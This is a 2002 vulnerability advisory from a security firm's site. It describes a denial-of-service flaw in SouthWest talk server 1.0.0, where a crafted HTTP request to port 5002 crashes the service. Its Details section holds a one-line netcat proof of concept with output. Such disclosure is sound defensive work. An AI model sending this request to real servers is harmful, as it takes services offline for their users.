© Neurowork™ 2010. Todos los derechos reservados.
Syb Security
es una unidad de negocio de Neurowork™ |
Otras unidades de negocio
Acerca de Neurowork™ | Mapa del sitio | Términos de uso | Marcas registradas | Política de privacidad | Comentarios
redlink Buscar
 redlink Seleccione Idioma
print e-mail sitemap
Bookmark and Share

Advisories

SYBSEC-ADV11: SouthWest talk server HTTP port Denial of Service

Title
SouthWest talk server HTTP port Denial of Service
ID
SYBSEC-ADV11
Severity
LOW - Denial of Service
History
20.MAR.2002 Vulnerability discovered
21.MAR.2002 Vendor contacted
Scope
Application Denial of Service
Platforms
Any win32 platforms
Author
URL
http://www.sybsecurity.com/advisors/SYBSEC-ADV11-SouthWest_talk_server_HTTP_port_denial_Of_Service
Release
Public
Overview
SouthWest is a freely available Telnet talk server for Microsoft Windows based on Neils Unix Talk Server (NUTS).
Affected versions
The vulnerability has been reported in versions WEB Server
Scott Lloyd: SouthWest 1.0.0
Description
SouthWest version 1.0.0 is vulnerable to a denial of service attack. A remote attacker could send a specially-crafted HTTP request to the HTTP server listening on port 5002 to cause the service to crash. The service must be restarted to regain normal functionality.
Workaround
Upgrade the sofware version you can download from:
http://www.ewtoo.org/~silver/southwest
Acknowledgments
This vulnerability have been found and researched by:
- Alex Hernandez <ahernandez [at] sybsecurity [dot] com>
References
Details
Example:
$ printf "GET /&Alex" |nc -vvn 127.0.0.1 5002
(UNKNOWN) [127.0.0.1] 5002 (?) open
sent 10, rcvd 0: NOTSOCK

$ nc -vvn 127.0.0.1 5002
(UNKNOWN) [127.0.0.1] 5002 (?): connection refused
sent 0, rcvd 0: NOTSOCK

$ nc -vvn 127.0.0.1 5000
(UNKNOWN) [127.0.0.1] 5000 (?): connection refused
sent 0, rcvd 0: NOTSOCK

$ nc -vvn 127.0.0.1 5001
(UNKNOWN) [127.0.0.1] 5000 (?): connection refused
sent 0, rcvd 0: NOTSOCK